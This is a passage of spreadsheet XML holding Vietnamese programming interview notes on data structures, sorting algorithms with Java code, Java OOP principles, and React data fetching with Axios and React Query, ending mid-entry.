    <t>Hãy phân biệt giữa mảng (Array) và danh sách liên kết (Linked List). Khi nào thì nên sử dụng cái nào?</t>
  </si>
  <si>
    <t>Mảng: Kích thước cố định, truy cập ngẫu nhiên O(1), chèn/xóa ở giữa O(n), sử dụng bộ nhớ liền kề.
Danh sách liên kết: Kích thước động, truy cập tuần tự O(n), chèn/xóa O(1) (nếu đã có con trỏ đến vị trí), sử dụng bộ nhớ phân tán.
Khi nào sử dụng: Mảng khi biết trước kích thước và cần truy cập nhanh theo chỉ số; Linked List khi cần chèn/xóa thường xuyên và kích thước không xác định.</t>
  </si>
  <si>
    <t>Hãy so sánh các thuật toán sắp xếp phổ biến như Bubble Sort, Selection Sort, Insertion Sort, Merge Sort và Quick Sort về độ phức tạp thời gian và không gian.</t>
  </si>
  <si>
    <t>O(n 
2
 ): Bubble, Selection, Insertion (đơn giản, hiệu quả với dữ liệu nhỏ hoặc gần sắp xếp).
O(nlogn): Merge, Quick (hiệu quả với dữ liệu lớn).
Merge Sort: Sử dụng không gian O(n), ổn định.
Quick Sort: Trung bình O(nlogn), tệ nhất O(n 
2
 ), không ổn định, sử dụng không gian O(logn) (đệ quy).</t>
  </si>
  <si>
    <t>Giải thích về Stack và Queue. Nêu các thao tác cơ bản và ứng dụng của chúng.</t>
  </si>
  <si>
    <t>Stack (ngăn xếp): LIFO (Last-In, First-Out). Thao tác: push(), pop(), peek(). Ứng dụng: Duyệt đệ quy, undo/redo, kiểm tra dấu ngoặc.
Queue (hàng đợi): FIFO (First-In, First-Out). Thao tác: enqueue(), dequeue(), peek(). Ứng dụng: Quản lý tác vụ, hàng đợi in ấn, duyệt đồ thị BFS.</t>
  </si>
  <si>
    <t>Bubble Sort (Sắp xếp nổi bọt)
Ý tưởng: So sánh từng cặp phần tử liền kề và hoán đổi nếu chúng không đúng thứ tự. Lặp lại cho đến khi mảng được sắp xếp.
Độ phức tạp:
Thời gian: O(n²) (trường hợp xấu và trung bình), O(n) (trường hợp tốt nhất, gần sắp xếp).
Không gian: O(1).
Ưu điểm: Đơn giản, dễ hiểu.
Nhược điểm: Hiệu suất kém với mảng lớn.</t>
  </si>
  <si>
    <t>public class BubbleSort {
    public static void bubbleSort(int[] arr) {
        int n = arr.length;
        for (int i = 0; i &lt; n - 1; i++) {
            for (int j = 0; j &lt; n - i - 1; j++) {
                if (arr[j] &gt; arr[j + 1]) {
                    // Hoán đổi
                    int temp = arr[j];
                    arr[j] = arr[j + 1];
                    arr[j + 1] = temp;
                }
            }
        }
    }
    public static void main(String[] args) {
        int[] arr = {64, 34, 25, 12, 22, 11, 90};
        bubbleSort(arr);
        System.out.println("Mảng sau khi sắp xếp: " + Arrays.toString(arr));
    }
}</t>
  </si>
  <si>
    <t>Selection Sort (Sắp xếp chọn)
Ý tưởng: Tìm phần tử nhỏ nhất (hoặc lớn nhất) trong đoạn chưa sắp xếp và đặt nó vào vị trí đầu tiên của đoạn đó. Lặp lại cho đến khi hết mảng.
Độ phức tạp:
Thời gian: O(n²) (tất cả trường hợp).
Không gian: O(1).
Ưu điểm: Ít hoán đổi hơn Bubble Sort.
Nhược điểm: Không hiệu quả với mảng lớn.</t>
  </si>
  <si>
    <t>public class SelectionSort {
    public static void selectionSort(int[] arr) {
        int n = arr.length;
        for (int i = 0; i &lt; n - 1; i++) {
            int minIdx = i;
            for (int j = i + 1; j &lt; n; j++) {
                if (arr[j] &lt; arr[minIdx]) {
                    minIdx = j;
                }
            }
            // Hoán đổi
            int temp = arr[minIdx];
            arr[minIdx] = arr[i];
            arr[i] = temp;
        }
    }
    public static void main(String[] args) {
        int[] arr = {64, 34, 25, 12, 22, 11, 90};
        selectionSort(arr);
        System.out.println("Mảng sau khi sắp xếp: " + Arrays.toString(arr));
    }
}</t>
  </si>
  <si>
    <t>Insertion Sort (Sắp xếp chèn)
Ý tưởng: Xây dựng mảng đã sắp xếp từng bước bằng cách lấy từng phần tử và chèn nó vào đúng vị trí trong đoạn đã sắp xếp.
Độ phức tạp:
Thời gian: O(n²) (trường hợp xấu và trung bình), O(n) (trường hợp tốt nhất, gần sắp xếp).
Không gian: O(1).
Ưu điểm: Hiệu quả với mảng nhỏ hoặc gần sắp xếp.
Nhược điểm: Không phù hợp với mảng lớn.</t>
  </si>
  <si>
    <t>public class InsertionSort {
    public static void insertionSort(int[] arr) {
        int n = arr.length;
        for (int i = 1; i &lt; n; i++) {
            int key = arr[i];
            int j = i - 1;
            while (j &gt;= 0 &amp;&amp; arr[j] &gt; key) {
                arr[j + 1] = arr[j];
                j--;
            }
            arr[j + 1] = key;
        }
    }
    public static void main(String[] args) {
        int[] arr = {64, 34, 25, 12, 22, 11, 90};
        insertionSort(arr);
        System.out.println("Mảng sau khi sắp xếp: " + Arrays.toString(arr));
    }
}</t>
  </si>
  <si>
    <t>Quick Sort (Sắp xếp nhanh)
Ý tưởng: Chọn một phần tử làm "chốt" (pivot), phân chia mảng thành hai phần: các phần tử nhỏ hơn chốt và lớn hơn chốt. Đệ quy sắp xếp các phần này.
Độ phức tạp:
Thời gian: O(n log n) (trường hợp trung bình), O(n²) (trường hợp xấu, hiếm).
Không gian: O(log n) (do đệ quy).
Ưu điểm: Rất hiệu quả với mảng lớn, thường được sử dụng trong thực tế.
Nhược điểm: Hiệu suất kém nếu chốt được chọn không tốt.</t>
  </si>
  <si>
    <t>public class QuickSort {
    public static void quickSort(int[] arr, int low, int high) {
        if (low &lt; high) {
            int pi = partition(arr, low, high);
            quickSort(arr, low, pi - 1);
            quickSort(arr, pi + 1, high);
        }
    }
    public static int partition(int[] arr, int low, int high) {
        int pivot = arr[high];
        int i = low - 1;
        for (int j = low; j &lt; high; j++) {
            if (arr[j] &lt;= pivot) {
                i++;
                int temp = arr[i];
                arr[i] = arr[j];
                arr[j] = temp;
            }
        }
        int temp = arr[i + 1];
        arr[i + 1] = arr[high];
        arr[high] = temp;
        return i + 1;
    }
    public static void main(String[] args) {
        int[] arr = {64, 34, 25, 12, 22, 11, 90};
        quickSort(arr, 0, arr.length - 1);
        System.out.println("Mảng sau khi sắp xếp: " + Arrays.toString(arr));
    }
}</t>
  </si>
  <si>
    <t>Tính Đóng gói</t>
  </si>
  <si>
    <t>Tính đóng gói (Encapsulation) trong Java
Khái niệm:
Trong Java, tính đóng gói được thực hiện bằng cách khai báo các thuộc tính (field/variable) của một lớp là private (riêng tư) để ngăn chặn truy cập trực tiếp từ bên ngoài. Sau đó, bạn cung cấp các phương thức public (công khai) như getter (để lấy giá trị) và setter (để thiết lập giá trị) để kiểm soát cách dữ liệu được truy cập và sửa đổi.Lợi ích:
Kiểm soát dữ liệu: Bạn có thể áp dụng các quy tắc hoặc kiểm tra hợp lệ trước khi cho phép dữ liệu bị thay đổi.
Bảo mật: Ngăn chặn việc truy cập và sửa đổi dữ liệu một cách tùy tiện, không đúng quy tắc.
Dễ bảo trì: Khi có sự thay đổi trong cách lưu trữ dữ liệu nội bộ của lớp, các phần mềm khác sử dụng lớp đó không cần phải thay đổi, miễn là các phương thức getter/setter vẫn được giữ nguyên.</t>
  </si>
  <si>
    <t>// File: Car.java
public class Car {
    private String make;    // Thuộc tính private
    private String model;   // Thuộc tính private
    private int year;       // Thuộc tính private
    private int speed;      // Thuộc tính private
    // Constructor
    public Car(String make, String model, int year) {
        this.make = make;
        this.model = model;
        this.year = year;
        this.speed = 0; // Tốc độ ban đầu
    }
    // Getter cho thuộc tính make
    public String getMake() {
        return make;
    }
    // Setter cho thuộc tính make (có thể bỏ qua nếu không muốn cho phép thay đổi make sau khi tạo)
    public void setMake(String make) {
        this.make = make;
    }
    // Getter cho thuộc tính model
    public String getModel() {
        return model;
    }
    // Getter cho thuộc tính year
    public int getYear() {
        return year;
    }
    // Getter cho thuộc tính speed
    public int getSpeed() {
        return speed;
    }
 }</t>
  </si>
  <si>
    <t xml:space="preserve">   // Phương thức để tăng tốc (thay đổi speed một cách có kiểm soát)
    public void accelerate(int increment) {
        if (increment &gt; 0) {
            this.speed += increment;
            System.out.println("Current speed: " + this.speed + " km/h");
        } else {
            System.out.println("Increment must be positive.");
        }
    }
    // Phương thức để phanh (thay đổi speed một cách có kiểm soát)
    public void brake(int decrement) {
        if (decrement &gt; 0) {
            this.speed = Math.max(0, this.speed - decrement); // Đảm bảo tốc độ không âm
            System.out.println("Current speed: " + this.speed + " km/h");
        } else {
            System.out.println("Decrement must be positive.");
        }
    }
    public String getInfo() {
        return "Make: " + make + ", Model: " + model + ", Year: " + year;
    }public static void main(String[] args) {
        Car myCar = new Car("Toyota", "Camry", 2023);
        System.out.println(myCar.getInfo());
        System.out.println("Initial speed: " + myCar.getSpeed() + " km/h");
        myCar.accelerate(50);
        myCar.brake(20);
        // Cố gắng truy cập trực tiếp thuộc tính private (sẽ gây lỗi biên dịch)
        // System.out.println(myCar.speed); // Lỗi: speed has private access in Car
    }</t>
  </si>
  <si>
    <t>Tính kế thừa (Inheritance) trong Java</t>
  </si>
  <si>
    <t>Khái niệm:
Tính kế thừa cho phép một lớp (gọi là lớp con - subclass/derived class) thừa hưởng các thuộc tính và phương thức từ một lớp khác (gọi là lớp cha - superclass/base class). Từ khóa extends được sử dụng để thể hiện sự kế thừa trong Java.
Lợi ích:
Tái sử dụng mã: Tránh việc lặp lại mã bằng cách cho phép lớp con sử dụng lại các thành phần đã định nghĩa trong lớp cha.
Mở rộng chức năng: Dễ dàng thêm các chức năng đặc thù vào lớp con mà không làm ảnh hưởng đến lớp cha.
Tạo hệ thống phân cấp: Biểu diễn các mối quan hệ "là một" (is-a relationship), ví dụ: "Chó là một động vật", "Ô tô là một phương tiện".</t>
  </si>
  <si>
    <t>// File: Animal.java
class Animal {
    String name;
    public Animal(String name) {
        this.name = name;
    }
    public void eat() {
        System.out.println(name + " is eating.");
    }
    public void move() {
        System.out.println(name + " is moving.");
    }
    // Phương thức này sẽ được ghi đè ở lớp con
    public void makeSound() {
        System.out.println(name + " makes a sound.");
    }
}
// File: Dog.java
class Dog extends Animal { // Dog kế thừa từ Animal
    String breed;
    public Dog(String name, String breed) {
        super(name); // Gọi constructor của lớp cha
        this.breed = breed;
    }
    // Ghi đè phương thức makeSound() từ lớp cha
    @Override
    public void makeSound() {
        System.out.println(name + " says Woof!");
    }
    public void fetch() {
        System.out.println(name + " is fetching the ball.");
    }
}</t>
  </si>
  <si>
    <t>// File: Cat.java
class Cat extends Animal { // Cat kế thừa từ Animal
    String color;
    public Cat(String name, String color) {
        super(name); // Gọi constructor của lớp cha
        this.color = color;
    }
    // Ghi đè phương thức makeSound() từ lớp cha
    @Override
    public void makeSound() {
        System.out.println(name + " says Meow!");
    }
    public void scratch() {
        System.out.println(name + " is scratching.");
    }
}// File: InheritanceDemo.java (Lớp chứa phương thức main để chạy ví dụ)
public class InheritanceDemo {
    public static void main(String[] args) {
        Dog myDog = new Dog("Buddy", "Golden Retriever");
        Cat myCat = new Cat("Whiskers", "Tabby");
        System.out.println("--- Dog actions ---");
        myDog.eat();        // Thừa hưởng từ Animal
        myDog.move();       // Thừa hưởng từ Animal
        myDog.makeSound();  // Phương thức đã ghi đè
        myDog.fetch();      // Phương thức riêng của Dog
        System.out.println("\n--- Cat actions ---");
        myCat.eat();        // Thừa hưởng từ Animal
        myCat.move();       // Thừa hưởng từ Animal
        myCat.makeSound();  // Phương thức đã ghi đè
        myCat.scratch();    // Phương thức riêng của Cat
    }
}</t>
  </si>
  <si>
    <t>Tính đa hình (Polymorphism) trong Java</t>
  </si>
  <si>
    <t>Khái niệm:
Tính đa hình là khả năng một đối tượng có thể thực hiện một tác vụ theo nhiều cách khác nhau.
Đối với tính chất này, nó được thể hiện rõ nhất qua việc gọi phương thức của đối tượng. Các phương thức hoàn toàn có thể giống nhau, nhưng việc xử lý luồng có thể khác nhau. Nói cách khác: Tính đa hình cung cấp khả năng cho phép người lập trình gọi trước một phương thức của đối tượng, tuy chưa xác định đối tượng có phương thức muốn gọi hay không. Đến khi thực hiện (run-time), chương trình mới xác định được đối tượng và gọi phương thức tương ứng của đối tượng đó. Kết nối trễ giúp chương trình được uyển chuyển hơn, chỉ yêu cầu đối tượng cung cấp đúng phương thức cần thiết là đủ.
Trong Java, chúng ta sử dụng nạp chồng phương thức (method overloading) và ghi đè phương thức (method overriding) để có tính đa hình.
Nạp chồng (Overloading): Đây là khả năng cho phép một lớp có nhiều thuộc tính, phương thức cùng tên nhưng với các tham số khác nhau về loại cũng như về số lượng. Khi được gọi, dựa vào tham số truyền vào, phương thức tương ứng sẽ được thực hiện.
Ghi đè (Overriding): là hai phương thức cùng tên, cùng tham số, cùng kiểu trả về nhưng thằng con viết lại và dùng theo cách của nó, và xuất hiện ở lớp cha và tiếp tục xuất hiện ở lớp con. Khi dùng override, lúc thực thi, nếu lớp Con không có phương thức riêng, phương thức của lớp Cha sẽ được gọi, ngược lại nếu có, phương thức của lớp Con được gọi.
Lợi ích:
Linh hoạt: Code có thể làm việc với các đối tượng thuộc nhiều loại khác nhau một cách thống nhất.
Khả năng mở rộng: Dễ dàng thêm các loại đối tượng mới mà không cần thay đổi code hiện có.
Giảm sự phức tạp: Viết mã chung cho các hành vi tương tự.</t>
  </si>
  <si>
    <t>Đa hình thời gian chạy (Runtime Polymorphism) / Ghi đè phương thức (Method Overriding): Lớp con cung cấp cài đặt cụ thể cho một phương thức đã được định nghĩa trong lớp cha. (Như ví dụ makeSound() ở trên)./ File: PolymorphismDemo.java (Tiếp tục ví dụ Animal, Dog, Cat)
public class PolymorphismDemo {
    public static void main(String[] args) {
        // Tạo các đối tượng của các lớp con
        Animal myDog = new Dog("Rocky", "German Shepherd"); // Tham chiếu kiểu Animal, đối tượng kiểu Dog
        Animal myCat = new Cat("Luna", "Siamese");          // Tham chiếu kiểu Animal, đối tượng kiểu Cat
        // Thêm một lớp con khác để minh họa rõ hơn
        Animal myDuck = new Duck("Donald");                 // Tham chiếu kiểu Animal, đối tượng kiểu Duck
        // Gọi phương thức makeSound() thông qua tham chiếu lớp cha
        // Hành vi của makeSound() sẽ khác nhau tùy thuộc vào loại đối tượng thực tế
        System.out.println("--- Polymorphism in action ---");
        makeAnimalSound(myDog);
        makeAnimalSound(myCat);
        makeAnimalSound(myDuck);
        // myDog.fetch(); // Lỗi: Không thể gọi phương thức riêng của Dog thông qua tham chiếu Animal
    }
    // Phương thức chấp nhận một đối tượng Animal làm tham số
    public static void makeAnimalSound(Animal animal) {
        animal.makeSound(); // Phương thức này sẽ gọi phiên bản ghi đè của lớp con
    }
}
// File: Duck.java (Để minh họa thêm cho đa hình)
class Duck extends Animal {
    public Duck(String name) {
        super(name);
    }
    @Override
    public void makeSound() {
        System.out.println(name + " says Quack!");
    }
}</t>
  </si>
  <si>
    <t>Đa hình thời gian biên dịch (Compile-time Polymorphism) / Nạp chồng phương thức (Method Overloading): Nhiều phương thức cùng tên trong cùng một lớp nhưng khác nhau về số lượng hoặc kiểu dữ liệu của các tham số.class Calculator {
    public int add(int a, int b) { return a + b; }
    public double add(double a, double b) { return a + b; } // Nạp chồng phương thức
    public int add(int a, int b, int c) { return a + b + c; } // Nạp chồng phương thức
}</t>
  </si>
  <si>
    <t>Tính trừu tượng (Abstraction) trong Java</t>
  </si>
  <si>
    <t>Trừu tượng là quá trình ẩn đi các chi tiết triển khai phức tạp và chỉ hiển thị các chức năng cần thiết cho người dùng. Mục tiêu là đơn giản hóa cách người dùng tương tác với hệ thống, tập trung vào "cái gì" (what) thay vì "cách thức" (how).
Hãy tưởng tượng bạn đang lái xe. Bạn chỉ cần biết cách sử dụng vô lăng, chân ga, chân phanh để điều khiển xe. Bạn không cần phải hiểu chi tiết về cách động cơ hoạt động, cách truyền động lực, hay cách hệ thống phanh hãm xe. Tất cả các chi tiết phức tạp đó đã được "trừu tượng hóa" đi.</t>
  </si>
  <si>
    <t>Khái niệm:
Tính trừu tượng tập trung vào "những gì" một đối tượng làm chứ không phải "cách thức" nó làm. Trong Java, tính trừu tượng được thực hiện thông qua lớp trừu tượng (abstract class) và giao diện (interface).
Lớp trừu tượng: Là một lớp có thể chứa cả phương thức cụ thể (có cài đặt) và phương thức trừu tượng (không có cài đặt, chỉ có khai báo và kết thúc bằng ;). Một lớp trừu tượng không thể được khởi tạo trực tiếp (new AbstractClass()). Nếu một lớp kế thừa từ một lớp trừu tượng, nó phải cài đặt tất cả các phương thức trừu tượng của lớp cha, hoặc bản thân nó cũng phải là một lớp trừu tượng.
Giao diện (interface): Là một bản thiết kế hoàn toàn trừu tượng, chỉ chứa các khai báo phương thức (từ Java 8 trở đi có thể có default và static methods có cài đặt). Một lớp có thể cài đặt nhiều giao diện.// File: AbstractionDemo.java
public class AbstractionDemo {
    public static void main(String[] args) {
        // Không thể tạo đối tượng từ lớp trừu tượng Vehicle
        // Vehicle myVehicle = new Vehicle("Generic"); // Lỗi biên dịch
        Car myCar = new Car("Honda", "CRV");
        Motorcycle myMotorcycle = new Motorcycle("Yamaha", "Sport");
        System.out.println("--- Car actions ---");
        myCar.startEngine();
        myCar.refuel(); // Phương thức cụ thể được thừa hưởng
        myCar.stopEngine();
        System.out.println("\n--- Motorcycle actions ---");
        myMotorcycle.startEngine();
        myMotorcycle.refuel();
        myMotorcycle.stopEngine();
    }
}</t>
  </si>
  <si>
    <t>// File: Vehicle.java
abstract class Vehicle { // Lớp trừu tượng
    String brand;
    public Vehicle(String brand) {
        this.brand = brand;
    }
    // Phương thức trừu tượng (không có thân phương thức)
    public abstract void startEngine();
    // Phương thức trừu tượng
    public abstract void stopEngine();
    // Phương thức cụ thể (có thân phương thức)
    public void refuel() {
        System.out.println(brand + " is refueling.");
    }
}
// File: Car.java (lớp con cụ thể của Vehicle)
class Car extends Vehicle {
    String model;
    public Car(String brand, String model) {
        super(brand);
        this.model = model;
    }
    @Override // Bắt buộc phải cài đặt phương thức trừu tượng
    public void startEngine() {
        System.out.println(brand + " " + model + ": Car engine started with a key.");
    }
    @Override // Bắt buộc phải cài đặt phương thức trừu tượng
    public void stopEngine() {
        System.out.println(brand + " " + model + ": Car engine stopped.");
    }
}
// File: Motorcycle.java (lớp con cụ thể của Vehicle)
class Motorcycle extends Vehicle {
    String type;
    public Motorcycle(String brand, String type) {
        super(brand);
        this.type = type;
    }
    @Override
    public void startEngine() {
        System.out.println(brand + " " + type + ": Motorcycle engine started with a kickstand.");
    }
    @Override
    public void stopEngine() {
        System.out.println(brand + " " + type + ": Motorcycle engine stopped.");
    }
}</t>
  </si>
  <si>
    <t>intercafe</t>
  </si>
  <si>
    <t>Trong ví dụ về giao diện:
Giao diện là một "hợp đồng" (contract) định nghĩa một tập hợp các phương thức (và từ Java 8 trở đi, có thể có phương thức default và static có triển khai) mà một lớp phải triển khai nếu nó muốn hiện thực (implement) giao diện đó.
Drivable định nghĩa một "hợp đồng" rằng bất kỳ lớp nào triển khai nó phải có hành vi drive() và steer().
ElectricCar và Bus triển khai giao diện Drivable, buộc chúng phải cung cấp cài đặt cho các phương thức đó.
default method honk() trong giao diện cho phép các lớp triển khai sử dụng nó mà không cần cài đặt lại, hoặc có thể ghi đè nó. Khi nào sử dụng Giao diện?
Khi bạn muốn định nghĩa một tập hợp các hành vi mà các lớp không liên quan về mặt kế thừa có thể chia sẻ.
Khi bạn muốn đạt được đa kế thừa về "hành vi" (mặc dù Java không hỗ trợ đa kế thừa lớp).
Khi bạn muốn tạo một "hợp đồng" mà các lớp phải tuân theo.
Khi bạn muốn tách biệt hoàn toàn định nghĩa hành vi khỏi triển khai.</t>
  </si>
  <si>
    <t xml:space="preserve">// File: Drivable.java
interface Drivable { // Giao diện
    void drive(); // Phương thức trừu tượng mặc định (public abstract)
    void steer();
    // Từ Java 8 trở đi, có thể có default methods
    default void honk() {
        System.out.println("Beep beep!");
    }
}
// File: ElectricCar.java
class ElectricCar implements Drivable { // Triển khai giao diện
    String brand;
    public ElectricCar(String brand) {
        this.brand = brand;
    }
    @Override
    public void drive() {
        System.out.println(brand + " Electric Car is driving silently.");
    }
    @Override
    public void steer() {
        System.out.println(brand + " Electric Car is steering.");
    }
    // Có thể ghi đè default method nếu muốn
    @Override
    public void honk() {
        System.out.println(brand + " Electric Car makes a soft honk.");
    }
}
// File: Bus.java
class Bus implements Drivable {
    String route;
    public Bus(String route) {
        this.route = route;
    }
    @Override
    public void drive() {
        System.out.println("Bus on route " + route + " is driving.");
    }
    @Override
    public void steer() {
        System.out.println("Bus on route " + route + " is steering.");
    }
}
</t>
  </si>
  <si>
    <t>// File: InterfaceDemo.java
public class InterfaceDemo {
    public static void main(String[] args) {
        ElectricCar tesla = new ElectricCar("Tesla");
        Bus cityBus = new Bus("Route 123");
        tesla.drive();
        tesla.steer();
        tesla.honk(); // Gọi default method hoặc method đã ghi đè
        cityBus.drive();
        cityBus.steer();
        cityBus.honk(); // Gọi default method
    }
}</t>
  </si>
  <si>
    <t>Data fetching trong React nên làm ở đâu?</t>
  </si>
  <si>
    <t>Cách cũ: Nằm bên trong useEffect, tự quản lý state (loading, error, data).</t>
  </si>
  <si>
    <t>Cách hiện đại: Đưa ra ngoài component bằng các Custom Hooks của thư viện quản lý Server State (như React Query, SWR), hoặc fetch trực tiếp trên Server với Server Components (Next.js).</t>
  </si>
  <si>
    <t>Fetch API là gì?</t>
  </si>
  <si>
    <t>Là hàm chuẩn (native) của trình duyệt để gọi mạng, dựa trên Promise. Không cần cài thêm thư viện.</t>
  </si>
  <si>
    <t>Axios khác Fetch thế nào?</t>
  </si>
  <si>
    <t>Axios là thư viện bên thứ 3 cực kỳ phổ biến.
Tự động parse JSON: Fetch bắt bạn phải gọi res.json(), Axios tự làm.</t>
  </si>
  <si>
    <t>Bắt lỗi thông minh: Axios tự ném lỗi vào khối catch nếu API trả về 400, 500. Fetch thì KHÔNG (chỉ nhảy vào catch khi mất mạng hoàn toàn), bạn phải tự check if (!res.ok).Có sẵn Interceptors (Đánh chặn request để nhét Token) và Timeout (Hủy nếu chờ quá lâu).</t>
  </si>
  <si>
    <t>// ❌ Dùng Fetch API (Code dài hơn, phải ép kiểu thủ công)
fetch('/api/users')
  .then(res =&gt; res.json()) // Phải tự biến thành JSON
  .then(data =&gt; console.log(data))
  .catch(err =&gt; console.log('Chỉ bắt lỗi khi đứt mạng hoàn toàn'));
// ✅ Dùng Axios (Ngắn gọn, tự động parse JSON, bắt lỗi chuẩn)
axios.get('/api/users')
  .then(res =&gt; console.log(res.data))
  .catch(err =&gt; console.log('Bắt được cả lỗi 400, 404, 500 của Server'));</t>
  </si>
  <si>
    <t>React Query (TanStack Query) là gì? Giải quyết vấn đề gì?</t>
  </si>
  <si>
    <t>Nó là một thư viện quản lý Server State. Nó xóa sổ hoàn toàn việc bạn phải tự viết useState và useEffect cho API.</t>
  </si>
  <si>
    <t>Nó giải quyết xuất sắc các bài toán khó nhất: Caching (Bộ nhớ đệm), Deduping (Chống gọi trùng API), Tự động gọi lại khi lỗi, và Đồng bộ dữ liệu ngầm.</t>
  </si>
  <si>
    <t>Cache API response để làm gì?</t>
  </si>
  <si>
    <t>Để tạo trải nghiệm Instant Load (Tải tức thì).</t>
  </si>
  <si>
    <t xml:space="preserve"> Nếu người dùng vừa ở Trang chủ, chuyển sang trang Giới thiệu, rồi bấm Quay lại Trang chủ, họ sẽ thấy bài viết ngay lập tức (0ms) thay vì phải nhìn icon Loading quay quay lần 2.</t>
  </si>
  <si>
    <t>Stale-while-revalidate là gì?</t>
  </si>
  <si>
    <t>Khi bạn cần data, nó lập tức lấy data cũ trong Cache (Stale) show ra màn hình để bạn xem tạm.</t>
  </si>
  <si>
    <t>Cùng lúc đó, nó ngầm (background) chạy đi hỏi Server lấy data mới (Revalidate). Nếu có data mới, nó sẽ tự động cập nhật lại màn hình một cách êm ái.</t>
  </si>
  <si>
    <t>const { data } = useQuery({
  queryKey: ['posts'],
  queryFn: fetchPosts,
  // Data sẽ được coi là "tươi" trong 5 phút. Trong thời gian này, 
  // dù đổi trang quay lại, React Query lấy thẳng từ RAM, KHÔNG gọi API.
  staleTime: 1000 * 60 * 5, 
  // Dữ liệu sẽ nằm trong kho lạnh 10 phút kể từ lúc bạn rời đi.
  // Quá 10 phút không ai ngó tới, tự động xóa để nhẹ RAM.
  cacheTime: 1000 * 60 * 10, 
  // Rớt mạng? Hệ thống tự động thử gọi lại tối đa 3 lần.
  retry: 3 
});</t>
  </si>
  <si>
    <t>Query key là gì?</t>
  </si>
  <si>
    <t>Mỗi API bạn gọi bằng React Query phải có một cái tên (mảng) duy nhất để hệ thống nhận diện và cache.
Ví dụ: ['users', 1] (Cache cho User có ID = 1), ['posts', { page: 2 }].</t>
  </si>
  <si>
    <t>function UserList() {
  // Query Key là mảng ['users'] để hệ thống nhận diện và lưu cache
  const { data, isLoading, isError } = useQuery({
    queryKey: ['users'],
    queryFn: () =&gt; axios.get('/api/users').then(res =&gt; res.data)
  });
  // Xử lý đủ 3 trạng thái của UX (Loading, Error, Empty)
  if (isLoading) return &lt;p&gt;Đang tải bộ xương Skeleton...&lt;/p&gt;;
  if (isError) return &lt;p&gt;Lỗi mạng, không gọi được Server!&lt;/p&gt;;
  if (data.length === 0) return &lt;p&gt;Chiếc hộp rỗng: Chưa có User nào&lt;/p&gt;;
  return &lt;ul&gt;{data.map(u =&gt; &lt;li key={u.id}&gt;{u.name}&lt;/li&gt;)}&lt;/ul&gt;;
}</t>
  </si>
  <si>
    <t>Cache time và Stale time khác nhau thế nào?Cực kỳ hay hỏi phỏng vấn</t>
  </si>
  <si>
    <t>Stale Time (Thời gian ôi thiu): Mặc định là 0. Khoảng thời gian data được coi là "tươi". Nếu data còn tươi, React Query tuyệt đối không gọi lại API.</t>
  </si>
  <si>
    <t>Cache Time (Tuổi thọ bộ nhớ): Mặc định là 5 phút. Nếu bạn rời khỏi trang đó (component unmount), data sẽ bị đưa vào "kho lạnh". Sau 5 phút không ai xài, nó sẽ bị xóa vĩnh viễn (Garbage Collection) để giải phóng RAM.</t>
  </si>
  <si>
    <t>Mutation là gì?</t>
  </si>
  <si>
    <t>Nếu useQuery dùng để LẤY data (GET), thì useMutation dùng để THAY ĐỔI data (POST, PUT, DELETE).</t>
  </si>
  <si>
    <t>const queryClient = useQueryClient();
const taoUserMoi = useMutation({
  mutationFn: (newUser) =&gt; axios.post('/api/users', newUser),
  onSuccess: () =&gt; {
    // Invalidation: Khi tạo mới thành công, ta báo cho React Query biết 
    // cái cache ['users'] bị cũ rồi. React Query lập tức chạy ngầm Refetch lấy list mới!
    queryClient.invalidateQueries({ queryKey: ['users'] });
  }
});
// Bấm nút để gọi hàm mutate
&lt;button onClick={() =&gt; taoUserMoi.mutate({ name: 'Alice' })}&gt;Tạo User&lt;/button&gt;</t>
  </si>
  <si>
    <t>Pagination (Phân trang) làm sao?</t>
  </si>
  <si>
    <t>Truyền số trang vào Query Key: useQuery({ queryKey: ['posts', page], ... }). Mẹo nhỏ: Dùng thêm cờ keepPreviousData: true để giao diện không bị giật nháy (chớp trắng màn hình) trong lúc chờ tải trang tiếp theo.</t>
  </si>
  <si>
    <t>const queryClient = useQueryClient();
const [page, setPage] = useState(1);
const { data } = useQuery({
  queryKey: ['products', page],
  queryFn: () =&gt; fetchProducts(page),
  // Giữ lại data của trang cũ trên màn hình trong lúc chờ tải trang mới (Chống giật trắng trang)
  keepPreviousData: true 
});
// Hàm Prefetch (Tải trước): Khi người dùng đưa chuột vào chữ "Next Page", 
// ta ngầm gọi hàm này để tải sẵn data. Họ bấm click là hiển thị ngay (0ms).
const prefetchNextPage = () =&gt; {
  queryClient.prefetchQuery({
    queryKey: ['products', page + 1],
    queryFn: () =&gt; fetchProducts(page + 1)
  });
};</t>
  </si>
  <si>
    <t>Infinite scroll (Cuộn vô tận) làm sao?</t>
  </si>
  <si>
    <t>Dùng hook chuyên dụng useInfiniteQuery. Nó sẽ quản lý giúp bạn mảng dữ liệu đa chiều (các trang nối tiếp nhau) và cung cấp hàm fetchNextPage() để bạn gắn vào sự kiện cuộn chuột chạm đáy.</t>
  </si>
  <si>
    <t>Dependent query là gì? (Gọi nối tiếp)</t>
  </si>
  <si>
    <t>// PARALLEL: Gọi 2 API cùng lúc, không thằng nào đợi thằng nào
const userQuery = useQuery({ queryKey: ['user'], queryFn: fetchUser });
const configQuery = useQuery({ queryKey: ['config'], queryFn: fetchConfig });
// DEPENDENT: Đợi API User có kết quả (lấy được cái ID), rồi mới chạy API Order
const ordersQuery = useQuery({
  queryKey: ['orders', userQuery.data?.id],
  queryFn: () =&gt; fetchOrders(userQuery.data.id),
  // Cờ enabled = true/false. Ép API này phải đứng chờ!
  enabled: !!userQuery.data?.id 
});</t>
  </si>
  <si>
    <t>Parallel query là gì?</t>
  </si>
  <si>
    <t>Gọi nhiều API hoàn toàn độc lập với nhau (Không chờ đợi nhau). Cứ khai báo nhiều useQuery liên tiếp, React Query sẽ tự động bắn chúng đi song song. Nếu cần mảng động, dùng useQueries.</t>
  </si>
  <si>
    <t>Prefetch query là gì?</t>
  </si>
  <si>
    <t>Khi người dùng đang đọc danh sách sản phẩm, bạn có thể ngầm gọi queryClient.prefetchQuery() tải sẵn chi tiết của 3 sản phẩm đầu tiên. Người dùng bấm vào phát là hiện ra ngay.</t>
  </si>
  <si>
    <t>Xử lý Loading, Error, Empty state?</t>
  </si>
  <si>
    <t>Làm UX tốt cần bao phủ đủ 3 trạng thái:isLoading: Hiển thị Skeleton (Khung xám nhấp nháy) thay vì vòng tròn quay quay.</t>
  </si>
  <si>
    <t>isError: Hiện thông báo lỗi thân thiện + nút "Thử lại".</t>
  </si>
  <si>
    <t>data?.length === 0: Hiện giao diện Empty State (Hình ảnh một cái hộp rỗng) thay vì một trang web trắng tinh.</t>
  </si>
  <si>
    <t>Race condition khi fetch data là gì?</t>
  </si>
  <si>
